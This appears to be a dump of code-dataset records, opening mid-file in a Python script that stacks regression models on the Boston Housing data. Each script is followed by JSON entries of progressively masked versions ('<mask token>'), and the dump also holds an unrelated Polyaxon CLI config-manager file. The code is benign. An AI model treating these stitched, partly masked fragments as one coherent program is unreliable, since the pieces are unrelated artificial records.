max_depth = 5, min_child_weight = 2, gamma = 0.17,
subsample = 0.84, colsample_bytree = 0.85,
reg_alpha = 0.008, reg_lambda = 1.2,
scale_pos_weight = 1, seed = 42)
xgb_cv_scores = cross_val_score(xgb_mdl, X_train, Y_train, cv=5, scoring='r2')
print(" DONE! CV Scores: {:.4f} (+/- {:.4f})" .format(xgb_cv_scores.mean(),\
xgb_cv_scores.std() * 2))
# RandomForestRegressor - baseline model #3
print("------- FITTING RandomForestRegressor -------")
rf_mdl = RandomForestRegressor(n_estimators = 95, max_features = 'auto',
max_depth = 18, min_samples_split = 2,
min_samples_leaf = 1, bootstrap = True,
random_state = 42)
rf_cv_scores = cross_val_score(rf_mdl, X_train, Y_train, cv=5, scoring='r2')
print(" DONE! CV Scores: {:.4f} (+/- {:.4f})" .format(rf_cv_scores.mean(),\
rf_cv_scores.std() * 2))
class Ensemble(object):
"""Ensemble base_models on train data than fit/predict
The object input is composed of 'n_splits', 'stacker' and list of
'base_models'.
The __init__ method self-assign the inputs.
The fit_predict method divides the dataset in 'n_splits' then it loops
trough ammount of 'base_models' fitting all splits and then averaging it on
a new column in the end. In the end, predictions are made with these new
columns.
If sought the use of voting ensemble, the ammount of models passed on
base_models can be repeated.
"""
def __init__(self, n_splits, stacker, base_models):
self.n_splits = n_splits
self.stacker = stacker
self.base_models = base_models
def fit_predict(self, X, Y, T):
X = np.array(X)
Y = np.array(Y)
T = np.array(T)
# Create folds on the dataset based on n_splits
folds = list(KFold(n_splits = self.n_splits, shuffle = True,
random_state = 42).split(X, Y))
S_train = np.zeros((X.shape[0], len(self.base_models)))
S_test = np.zeros((T.shape[0], len(self.base_models)))
# Loop trough base_models
print("------- FITTING Stacker - 2nd level -------")
for i, clf in enumerate(self.base_models):
# Create a dummy to calculate predictions on all folds
S_test_i = np.zeros((T.shape[0], self.n_splits))
# Loop trough data folds
for j, (train_idx, test_idx) in enumerate(folds):
X_train = X[train_idx]
Y_train = Y[train_idx]
X_holdout = X[test_idx]
Y_holdout = Y[test_idx]
clf.fit(X_train, Y_train)
Y_pred = clf.predict(X_holdout)[:]
print (" Model {}, fold {}. R^2 score: {:.4f}"\
.format(i, j, r2_score(Y_holdout, Y_pred)))
S_train[test_idx, i] = Y_pred
S_test_i[:, j] = clf.predict(T)[:]
# Update test data with average of predictions from the dummy
S_test[:, i] = S_test_i.mean(axis = 1)
# Print final CV score
results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')
print("\033[1;92mDONE! \033[0;0m\033[1;37mCV scores: {:.4f} (+/- {:.4f})"
.format(results.mean(), results.std() * 2))
# After creating new features on the test data, fit the chosen stacker
# on train data and finally predict on test data, then return
self.stacker.fit(S_train, Y)
final_prediction = self.stacker.predict(S_test)[:]
return final_prediction
stack = Ensemble(n_splits = 5, stacker = svr_mdl,
base_models = (xgb_mdl, rf_mdl, xgb_mdl, svr_mdl, xgb_mdl))
stack_pred = stack.fit_predict(X_train, Y_train, X_test)
##### PLOTS #####
# Plot outputs using scatter. Ticks are diabled and everything else is the clea-
# nest that I could. Predicted prices vs Real Prices
custom_style = {'axes.labelcolor': 'white',
'xtick.color': 'white',
'ytick.color': 'white'}
data = pd.DataFrame(data = {'stack_pred': stack_pred, 'Y_test': Y_test})
ax = sns.lmplot(x='Y_test', y='stack_pred', data = data, truncate=True, size=5)
ax.set_axis_labels("Real prices", "Predicted prices")
plt.tick_params(axis='both', colors='gray')
plt.title("Real vs Predicted prices on Boston Housing", fontweight = 'bold')
plt.tight_layout()
plt.show()
|
normal
|
{
"blob_id": "21c581131cff8cf2f4aa407055184d56865a6335",
"index": 9783,
"step-1": "<mask token>\n\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n folds = list(KFold(n_splits=self.n_splits, shuffle=True,\n random_state=42).split(X, Y))\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n print('------- FITTING Stacker - 2nd level -------')\n for i, clf in enumerate(self.base_models):\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n print(' Model {}, fold {}. R^2 score: {:.4f}'.format(i, j,\n r2_score(Y_holdout, Y_pred)))\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n S_test[:, i] = S_test_i.mean(axis=1)\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\n '\\x1b[1;92mDONE! \\x1b[0;0m\\x1b[1;37mCV scores: {:.4f} (+/- {:.4f})'\n .format(results.mean(), results.std() * 2))\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n return final_prediction\n\n\n<mask token>\n",
"step-2": "<mask token>\nsns.set()\n<mask token>\nprint('------- FITTING SVR -------')\n<mask token>\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(svr_cv_scores.mean(),\n svr_cv_scores.std() * 2))\nprint('------- FITTING XGBRegressor -------')\n<mask token>\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(xgb_cv_scores.mean(),\n xgb_cv_scores.std() * 2))\nprint('------- FITTING RandomForestRegressor -------')\n<mask token>\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(rf_cv_scores.mean(), \n rf_cv_scores.std() * 2))\n\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n folds = list(KFold(n_splits=self.n_splits, shuffle=True,\n random_state=42).split(X, Y))\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n print('------- FITTING Stacker - 2nd level -------')\n for i, clf in enumerate(self.base_models):\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n print(' Model {}, fold {}. R^2 score: {:.4f}'.format(i, j,\n r2_score(Y_holdout, Y_pred)))\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n S_test[:, i] = S_test_i.mean(axis=1)\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\n '\\x1b[1;92mDONE! \\x1b[0;0m\\x1b[1;37mCV scores: {:.4f} (+/- {:.4f})'\n .format(results.mean(), results.std() * 2))\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n return final_prediction\n\n\n<mask token>\nax.set_axis_labels('Real prices', 'Predicted prices')\nplt.tick_params(axis='both', colors='gray')\nplt.title('Real vs Predicted prices on Boston Housing', fontweight='bold')\nplt.tight_layout()\nplt.show()\n",
"step-3": "<mask token>\nsns.set()\nboston = datasets.load_boston()\nboston_pd = pd.DataFrame(boston.data)\nboston_pd.columns = boston.feature_names\nX, Y = boston_pd, boston.target\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1,\n random_state=42)\nprint('------- FITTING SVR -------')\nsvr_mdl = SVR(kernel='linear', C=0.11, epsilon=0.011, gamma=0.1)\nsvr_cv_scores = cross_val_score(svr_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(svr_cv_scores.mean(),\n svr_cv_scores.std() * 2))\nprint('------- FITTING XGBRegressor -------')\nxgb_mdl = xgb.XGBRegressor(learning_rate=0.0503, n_estimators=339,\n max_depth=5, min_child_weight=2, gamma=0.17, subsample=0.84,\n colsample_bytree=0.85, reg_alpha=0.008, reg_lambda=1.2,\n scale_pos_weight=1, seed=42)\nxgb_cv_scores = cross_val_score(xgb_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(xgb_cv_scores.mean(),\n xgb_cv_scores.std() * 2))\nprint('------- FITTING RandomForestRegressor -------')\nrf_mdl = RandomForestRegressor(n_estimators=95, max_features='auto',\n max_depth=18, min_samples_split=2, min_samples_leaf=1, bootstrap=True,\n random_state=42)\nrf_cv_scores = cross_val_score(rf_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(rf_cv_scores.mean(), \n rf_cv_scores.std() * 2))\n\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n folds = list(KFold(n_splits=self.n_splits, shuffle=True,\n random_state=42).split(X, Y))\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n print('------- FITTING Stacker - 2nd level -------')\n for i, clf in enumerate(self.base_models):\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n print(' Model {}, fold {}. R^2 score: {:.4f}'.format(i, j,\n r2_score(Y_holdout, Y_pred)))\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n S_test[:, i] = S_test_i.mean(axis=1)\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\n '\\x1b[1;92mDONE! \\x1b[0;0m\\x1b[1;37mCV scores: {:.4f} (+/- {:.4f})'\n .format(results.mean(), results.std() * 2))\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n return final_prediction\n\n\nstack = Ensemble(n_splits=5, stacker=svr_mdl, base_models=(xgb_mdl, rf_mdl,\n xgb_mdl, svr_mdl, xgb_mdl))\nstack_pred = stack.fit_predict(X_train, Y_train, X_test)\ncustom_style = {'axes.labelcolor': 'white', 'xtick.color': 'white',\n 'ytick.color': 'white'}\ndata = pd.DataFrame(data={'stack_pred': stack_pred, 'Y_test': Y_test})\nax = sns.lmplot(x='Y_test', y='stack_pred', data=data, truncate=True, size=5)\nax.set_axis_labels('Real prices', 'Predicted prices')\nplt.tick_params(axis='both', colors='gray')\nplt.title('Real vs Predicted prices on Boston Housing', fontweight='bold')\nplt.tight_layout()\nplt.show()\n",
"step-4": "import numpy as np\nimport xgboost as xgb\nfrom sklearn import datasets\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import cross_val_score, train_test_split, KFold\nfrom sklearn.metrics import r2_score\nsns.set()\nboston = datasets.load_boston()\nboston_pd = pd.DataFrame(boston.data)\nboston_pd.columns = boston.feature_names\nX, Y = boston_pd, boston.target\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.1,\n random_state=42)\nprint('------- FITTING SVR -------')\nsvr_mdl = SVR(kernel='linear', C=0.11, epsilon=0.011, gamma=0.1)\nsvr_cv_scores = cross_val_score(svr_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(svr_cv_scores.mean(),\n svr_cv_scores.std() * 2))\nprint('------- FITTING XGBRegressor -------')\nxgb_mdl = xgb.XGBRegressor(learning_rate=0.0503, n_estimators=339,\n max_depth=5, min_child_weight=2, gamma=0.17, subsample=0.84,\n colsample_bytree=0.85, reg_alpha=0.008, reg_lambda=1.2,\n scale_pos_weight=1, seed=42)\nxgb_cv_scores = cross_val_score(xgb_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(xgb_cv_scores.mean(),\n xgb_cv_scores.std() * 2))\nprint('------- FITTING RandomForestRegressor -------')\nrf_mdl = RandomForestRegressor(n_estimators=95, max_features='auto',\n max_depth=18, min_samples_split=2, min_samples_leaf=1, bootstrap=True,\n random_state=42)\nrf_cv_scores = cross_val_score(rf_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(' DONE! CV Scores: {:.4f} (+/- {:.4f})'.format(rf_cv_scores.mean(), \n rf_cv_scores.std() * 2))\n\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n folds = list(KFold(n_splits=self.n_splits, shuffle=True,\n random_state=42).split(X, Y))\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n print('------- FITTING Stacker - 2nd level -------')\n for i, clf in enumerate(self.base_models):\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n print(' Model {}, fold {}. R^2 score: {:.4f}'.format(i, j,\n r2_score(Y_holdout, Y_pred)))\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n S_test[:, i] = S_test_i.mean(axis=1)\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\n '\\x1b[1;92mDONE! \\x1b[0;0m\\x1b[1;37mCV scores: {:.4f} (+/- {:.4f})'\n .format(results.mean(), results.std() * 2))\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n return final_prediction\n\n\nstack = Ensemble(n_splits=5, stacker=svr_mdl, base_models=(xgb_mdl, rf_mdl,\n xgb_mdl, svr_mdl, xgb_mdl))\nstack_pred = stack.fit_predict(X_train, Y_train, X_test)\ncustom_style = {'axes.labelcolor': 'white', 'xtick.color': 'white',\n 'ytick.color': 'white'}\ndata = pd.DataFrame(data={'stack_pred': stack_pred, 'Y_test': Y_test})\nax = sns.lmplot(x='Y_test', y='stack_pred', data=data, truncate=True, size=5)\nax.set_axis_labels('Real prices', 'Predicted prices')\nplt.tick_params(axis='both', colors='gray')\nplt.title('Real vs Predicted prices on Boston Housing', fontweight='bold')\nplt.tight_layout()\nplt.show()\n",
"step-5": "#!/usr/bin/env python\n# Title : STACK_BostonHousing.py\n# Description : Stacking was the natural progression of our algorithms trial.\n# In here, we'll use prediction from a number of models in order\n# to improve accuracy as it add linearly independent data to our\n# dataset. Here we also use voting ensembler, using the best es-\n# timator three timers on the stack of second level models.\n# We'll find CV scores of each model on train_test_split then\n# stack the models on a 5-KFold of the data, finding final CV\n# score. We'll also plot the comparative graph of Real Prices vs\n# Predicted Prices\n# Author : Neves4\n# Outputs : Figure with one plot : 'Real Prices vs Predicted prices'\n# Values : SVR CV Scores: 0.6798 (+/- 0.0895)\n# XGB CV Scores: 0.8784 (+/- 0.0598)\n# RF CV Scores: 0.8601 (+/- 0.0789)\n# STACK CV Scores: 0.8809 (+/- 0.0864)\n# License : MIT License\n#==============================================================================\n\n##### IMPORTING #####\nimport numpy as np\nimport xgboost as xgb\nfrom sklearn import datasets\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import ElasticNet\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.model_selection import cross_val_score, train_test_split, KFold\nfrom sklearn.metrics import r2_score\n\nsns.set() # set seaborn style\n\n##### DECLARING AND TRAINING #####\n# Carregamento do dataset do boston, conversão para o framework pandas e como a\n# nomenclatura não é automática, foi dado valor às colunas da tabela do pandas.\n# Para verificar como estão os dados, chamar print(boston_pd.head())\nboston = datasets.load_boston()\nboston_pd = pd.DataFrame(boston.data)\nboston_pd.columns = boston.feature_names\n\n# É necessária então a divisão dos datasets, pelo método train_test_split. Para\n# encontrar o tamanho de cada tensor que foi dividido, print(X_train.shape)\nX, Y = boston_pd, boston.target\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size = 0.1,\n random_state = 42)\n\n# ##### 1ST LEVEL MODELS #####\n# # ElasticNet - baseline model #0\n# print(\"------- FITTING ElasticNet -------\")\n# en_mdl = ElasticNet(alpha = 5.2, l1_ratio = 0.5, random_state = 42)\n# en_cv_scores = cross_val_score(en_mdl, X_train, Y_train, cv=5, scoring='r2')\n# print(\" DONE! CV Scores: {:.4f} (+/- {:.4f})\" .format(en_cv_scores.mean(),\\\n# en_cv_scores.std() * 2))\n\n# SVR - baseline model #1\nprint(\"------- FITTING SVR -------\")\nsvr_mdl = SVR(kernel = 'linear', C = 0.11, epsilon = 0.011, gamma = 0.1)\nsvr_cv_scores = cross_val_score(svr_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(\" DONE! CV Scores: {:.4f} (+/- {:.4f})\" .format(svr_cv_scores.mean(),\\\n svr_cv_scores.std() * 2))\n\n# XGBRegressor - baseline model #2\nprint(\"------- FITTING XGBRegressor -------\")\nxgb_mdl = xgb.XGBRegressor(learning_rate = 0.0503, n_estimators = 339,\n max_depth = 5, min_child_weight = 2, gamma = 0.17,\n subsample = 0.84, colsample_bytree = 0.85,\n reg_alpha = 0.008, reg_lambda = 1.2,\n scale_pos_weight = 1, seed = 42)\nxgb_cv_scores = cross_val_score(xgb_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(\" DONE! CV Scores: {:.4f} (+/- {:.4f})\" .format(xgb_cv_scores.mean(),\\\n xgb_cv_scores.std() * 2))\n\n# RandomForestRegressor - baseline model #3\nprint(\"------- FITTING RandomForestRegressor -------\")\nrf_mdl = RandomForestRegressor(n_estimators = 95, max_features = 'auto',\n max_depth = 18, min_samples_split = 2,\n min_samples_leaf = 1, bootstrap = True,\n random_state = 42)\nrf_cv_scores = cross_val_score(rf_mdl, X_train, Y_train, cv=5, scoring='r2')\nprint(\" DONE! CV Scores: {:.4f} (+/- {:.4f})\" .format(rf_cv_scores.mean(),\\\n rf_cv_scores.std() * 2))\n\nclass Ensemble(object):\n \"\"\"Ensemble base_models on train data than fit/predict\n\n The object input is composed of 'n_splits', 'stacker' and list of\n 'base_models'.\n\n The __init__ method self-assign the inputs.\n\n The fit_predict method divides the dataset in 'n_splits' then it loops\n trough ammount of 'base_models' fitting all splits and then averaging it on\n a new column in the end. In the end, predictions are made with these new\n columns.\n\n If sought the use of voting ensemble, the ammount of models passed on\n base_models can be repeated.\n \"\"\"\n\n def __init__(self, n_splits, stacker, base_models):\n self.n_splits = n_splits\n self.stacker = stacker\n self.base_models = base_models\n\n def fit_predict(self, X, Y, T):\n X = np.array(X)\n Y = np.array(Y)\n T = np.array(T)\n\n # Create folds on the dataset based on n_splits\n folds = list(KFold(n_splits = self.n_splits, shuffle = True,\n random_state = 42).split(X, Y))\n\n S_train = np.zeros((X.shape[0], len(self.base_models)))\n S_test = np.zeros((T.shape[0], len(self.base_models)))\n\n # Loop trough base_models\n print(\"------- FITTING Stacker - 2nd level -------\")\n for i, clf in enumerate(self.base_models):\n\n # Create a dummy to calculate predictions on all folds\n S_test_i = np.zeros((T.shape[0], self.n_splits))\n\n # Loop trough data folds\n for j, (train_idx, test_idx) in enumerate(folds):\n X_train = X[train_idx]\n Y_train = Y[train_idx]\n X_holdout = X[test_idx]\n Y_holdout = Y[test_idx]\n\n clf.fit(X_train, Y_train)\n Y_pred = clf.predict(X_holdout)[:]\n\n print (\" Model {}, fold {}. R^2 score: {:.4f}\"\\\n .format(i, j, r2_score(Y_holdout, Y_pred)))\n\n S_train[test_idx, i] = Y_pred\n S_test_i[:, j] = clf.predict(T)[:]\n\n # Update test data with average of predictions from the dummy\n S_test[:, i] = S_test_i.mean(axis = 1)\n\n # Print final CV score\n results = cross_val_score(self.stacker, S_train, Y, cv=5, scoring='r2')\n print(\"\\033[1;92mDONE! \\033[0;0m\\033[1;37mCV scores: {:.4f} (+/- {:.4f})\"\n .format(results.mean(), results.std() * 2))\n\n # After creating new features on the test data, fit the chosen stacker\n # on train data and finally predict on test data, then return\n self.stacker.fit(S_train, Y)\n final_prediction = self.stacker.predict(S_test)[:]\n\n return final_prediction\n\nstack = Ensemble(n_splits = 5, stacker = svr_mdl,\n base_models = (xgb_mdl, rf_mdl, xgb_mdl, svr_mdl, xgb_mdl))\n\nstack_pred = stack.fit_predict(X_train, Y_train, X_test)\n\n##### PLOTS #####\n# Plot outputs using scatter. Ticks are diabled and everything else is the clea-\n# nest that I could. Predicted prices vs Real Prices\ncustom_style = {'axes.labelcolor': 'white',\n 'xtick.color': 'white',\n 'ytick.color': 'white'}\ndata = pd.DataFrame(data = {'stack_pred': stack_pred, 'Y_test': Y_test})\nax = sns.lmplot(x='Y_test', y='stack_pred', data = data, truncate=True, size=5)\nax.set_axis_labels(\"Real prices\", \"Predicted prices\")\nplt.tick_params(axis='both', colors='gray')\nplt.title(\"Real vs Predicted prices on Boston Housing\", fontweight = 'bold')\nplt.tight_layout()\nplt.show()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
#!/usr/bin/python
#
# Copyright 2018-2020 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from distutils.version import LooseVersion # pylint:disable=import-error
from polyaxon.managers.base import BaseConfigManager
from polyaxon.schemas.cli.cli_config import CliConfigurationConfig
class CliConfigManager(BaseConfigManager):
"""Manages access cli configuration .cli file."""
VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL
CONFIG_FILE_NAME = ".cli"
CONFIG = CliConfigurationConfig
FREQUENCY = 3
@classmethod
def _get_count(cls):
config = cls.get_config_or_default()
return config.check_count + 1
@classmethod
def reset(
cls,
check_count=None,
current_version=None,
server_versions=None,
log_handler=None,
):
if not any([check_count, current_version, server_versions, log_handler]):
return
cli_config = cls.get_config_or_default()
if check_count is not None:
cli_config.check_count = check_count
if current_version is not None:
cli_config.current_version = current_version
if server_versions is not None:
cli_config.server_versions = server_versions
if log_handler is not None:
cli_config.log_handler = log_handler
CliConfigManager.set_config(config=cli_config)
return cli_config
@classmethod
def should_check(cls):
count = cls._get_count()
cls.reset(check_count=count)
if count > cls.FREQUENCY:
return True
config = cls.get_config_or_default()
if config.current_version is None or config.min_version is None:
return True
return LooseVersion(config.current_version) < LooseVersion(config.min_version)
|
normal
|
{
"blob_id": "fd391d28d76b0c1b3cf6d0b5134390ab3f1267fb",
"index": 5152,
"step-1": "<mask token>\n\n\nclass CliConfigManager(BaseConfigManager):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(cls, check_count=None, current_version=None, server_versions=\n None, log_handler=None):\n if not any([check_count, current_version, server_versions, log_handler]\n ):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.\n min_version)\n",
"step-2": "<mask token>\n\n\nclass CliConfigManager(BaseConfigManager):\n <mask token>\n VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL\n CONFIG_FILE_NAME = '.cli'\n CONFIG = CliConfigurationConfig\n FREQUENCY = 3\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(cls, check_count=None, current_version=None, server_versions=\n None, log_handler=None):\n if not any([check_count, current_version, server_versions, log_handler]\n ):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.\n min_version)\n",
"step-3": "<mask token>\n\n\nclass CliConfigManager(BaseConfigManager):\n \"\"\"Manages access cli configuration .cli file.\"\"\"\n VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL\n CONFIG_FILE_NAME = '.cli'\n CONFIG = CliConfigurationConfig\n FREQUENCY = 3\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(cls, check_count=None, current_version=None, server_versions=\n None, log_handler=None):\n if not any([check_count, current_version, server_versions, log_handler]\n ):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.\n min_version)\n",
"step-4": "from distutils.version import LooseVersion\nfrom polyaxon.managers.base import BaseConfigManager\nfrom polyaxon.schemas.cli.cli_config import CliConfigurationConfig\n\n\nclass CliConfigManager(BaseConfigManager):\n \"\"\"Manages access cli configuration .cli file.\"\"\"\n VISIBILITY = BaseConfigManager.VISIBILITY_GLOBAL\n CONFIG_FILE_NAME = '.cli'\n CONFIG = CliConfigurationConfig\n FREQUENCY = 3\n\n @classmethod\n def _get_count(cls):\n config = cls.get_config_or_default()\n return config.check_count + 1\n\n @classmethod\n def reset(cls, check_count=None, current_version=None, server_versions=\n None, log_handler=None):\n if not any([check_count, current_version, server_versions, log_handler]\n ):\n return\n cli_config = cls.get_config_or_default()\n if check_count is not None:\n cli_config.check_count = check_count\n if current_version is not None:\n cli_config.current_version = current_version\n if server_versions is not None:\n cli_config.server_versions = server_versions\n if log_handler is not None:\n cli_config.log_handler = log_handler\n CliConfigManager.set_config(config=cli_config)\n return cli_config\n\n @classmethod\n def should_check(cls):\n count = cls._get_count()\n cls.reset(check_count=count)\n if count > cls.FREQUENCY:\n return True\n config = cls.get_config_or_default()\n if config.current_version is None or config.min_version is None:\n return True\n return LooseVersion(config.current_version) < LooseVersion(config.\n min_version)\n",
